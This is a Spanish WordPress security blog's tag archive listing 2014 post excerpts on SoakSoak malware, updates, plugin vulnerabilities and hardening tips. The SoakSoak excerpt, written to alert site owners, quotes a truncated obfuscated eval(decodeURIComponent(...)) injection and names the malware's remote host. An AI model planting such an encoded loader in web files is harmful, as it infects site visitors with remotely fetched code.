Hemeroteca de Tags | "Seguridad"

El malware SoakSoak infecta decenas de miles de WordPress

Lunes, 15 diciembre, 2014

Comentarios desactivados

Hace horas que se está reportando que hay decenas de miles de sitios WordPress comprometidos por infección del malware conocido como SoakSoak. Muchos usuarios se están enterando cuando los sistemas de detección de Google no dejan acceder a sus sitios, pero es un aviso para todos. Lo que sucede es que el atacante accede al fichero wp-includes/template-loader.php e incluye lo siguiente: Esto provoca que se añada lo siguiente al archivo wp-includes/js/swobject.js: eval(decodeURIComponent("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B")); Este malware, al descodificarse, carga un malware en javascript desde el dominio SoakSoak.ru, en concreto este archivo: hXXp://soaksoak.ru/xteas/code Si ya estás infectado la solución de urgencia es sustituir … Sigue leyendo que hay más →

Sigue leyendo...

Control de cambios profesional en WordPress

Martes, 2 diciembre, 2014

Comentarios desactivados

Una inquietud habitual de todo administrador de una web WordPress es poder controlar los cambios que hacen los clientes o usuarios con permisos para modificar ajustes de WordPress, y esta inquietud es fácil de eliminar. Por supuesto, puedes decidir no dar permisos de administrador a ningún usuario pero hay veces, sobre todo clientes, que no queda más remedio y ¡qué menos que saber que se cambia para poder revertir errores! ¿no? Además, no solo hablamos de cambios en ajustes, sino también en páginas o ¿por qué no? en entradas … y muchísimo más ¿quizás todo?. ¡Stream viene al rescate! Este … Sigue leyendo que hay más →

Sigue leyendo...

WordPress 4.0.1 actualización de seguridad ¡ya estás tardando en actualizar!

Jueves, 20 noviembre, 2014

Comentarios desactivados

Acaba de salir a la luz la versión de WordPress 4.0.1 que soluciona graves posibles problemas de seguridad y, en consecuencia, es altamente recomendable. En concreto incorpora los siguientes cambios: Soluciona nada menos que tres vulnerabilidades XSS (Cross Site Scripting) por las que un autor o colaborador podría comprometer la seguridad de un sitio. Arregla otra vulnerabilidad cruzada que podría usarse para engañar a un usuario para que cambie la contraseña. También soluciona un problema que podría conllevar una denegación de servicio al comprobar contraseñas. Incorpora protección adicional para peticiones de servidor ante ataques cuando WordPress hace peticiones HTTP. Ahora WordPress … Sigue leyendo que hay más →

Sigue leyendo...

¿Es realmente WordPress más seguro cambiando el prefijo de la base de datos?

Jueves, 23 octubre, 2014

Comentarios desactivados

Uno de los consejos más habituales que se dan (yo también) sobre seguridad en WordPress es no usar el prefijo por defecto de WordPress para las tablas de la base de datos pero ¿de verdad este cambio mejora la seguridad de WordPress? Ya sea desde la instalación o a posteriori (ver enlace del párrafo anterior), usar un prefijo distinto para las tablas de la base de datos es un consejo básico de seguridad en WordPress para evitar inyecciones SQL. Como ya sabrás, WordPress por defecto usa el prefijo wp_nombretabla pero ¿realmente es una mejora de seguridad usar otro como mistablas_nombretabla? … Sigue leyendo que hay más →

Sigue leyendo...

Ocultar que tu sitio está creado con WordPress

Lunes, 6 octubre, 2014

Comentarios desactivados

Hay múltiples razones por las que alguien quiera ocultar el hecho de que un sitio esté creado con WordPress, pero para mi la única es la seguridad, pues es tan popular que suele ser objetivo de los hackers, y nunca está de más ponérselo complicado. Afortunadamente es relativamente sencillo ocultar el hecho de que un sitio está hecho con WordPress, así que vamos a ver algunos modos de conseguirlo, luego tú aplicas los que más te gusten o sirvan. Eliminar la categoría de la URL Una de las evidencias de que un sitio está hecho con WordPress es el /category/ … Sigue leyendo que hay más →

Sigue leyendo...

WPScan, base de datos de vulnerabilidades WordPress

Jueves, 2 octubre, 2014

Comentarios desactivados

Acaba de salir a la luz un proyecto desde el que avisar y en el que revisar vulnerabilidades de WordPress, sus temas y plugins. A través de la web WPScan puedes avisar de cualquier vulnerabilidad que encuentres en temas, plugins o el mismo WordPress, o revisar las ya existentes y comprobar de qué se tratan para tener información de gran valor para tu web. El proyecto, desarrollado en Ruby, ha partido de una serie de desarrolladores, pero puedes participar en el escaner de vulnerabilidades en su página de github. El sistema, aunque no sustituye – ni debe hacerlo – al … Sigue leyendo que hay más →

Sigue leyendo...

TimThumb abandonado

Viernes, 26 septiembre, 2014

Comentarios desactivados

El célebre script de recorte de imágenes TimThumb, masivamente utilizado por temas y plugins, ha sido abandonado por su desarrollador, pasando a la ya célebre lista de abandonware. No carente de culpa por los distintos exploits que ha sufrido este script, estupendo por otra parte, el autor ha decidido abandonar su desarrollo y soporte, y recomienda a desarrolladores de plugins y temas que dejen de utilizarlo. Si usas algún tema o plugin que lo use “anima” a su desarrollador a que utilice algún método alternativo, pues si ya hasta ahora TimThumb era vulnerable no digamos una vez abandonado el desarrollo … Sigue leyendo que hay más →

Sigue leyendo...

Vulnerabilidad en el plugin Disqus: encontrada y solucionada

Viernes, 15 agosto, 2014

Comentarios desactivados

Hace ya unos meses que un investigador descubrió vulnerabilidades en el plugin de Disqus para WordPress que, afortunadamente, ya han sido solucionadas. Nik Cubrilovic, que es como se llama el buen samaritano, descubrió hasta tres posibles fallos graves en el plugin. El problema más gordo era un fallo que podría permitir una petición cruzada (XSS) en el fichero “Manage.php” del plugin, utilizado para los ajustes del mismo. El problema es que había parámetros sin el filtrado necesario que impidiese a un atacante inyectar un exploit. Para demostrarlo, el investigador de seguridad creó un exploit de ejemplo y lo probó en … Sigue leyendo que hay más →

Sigue leyendo...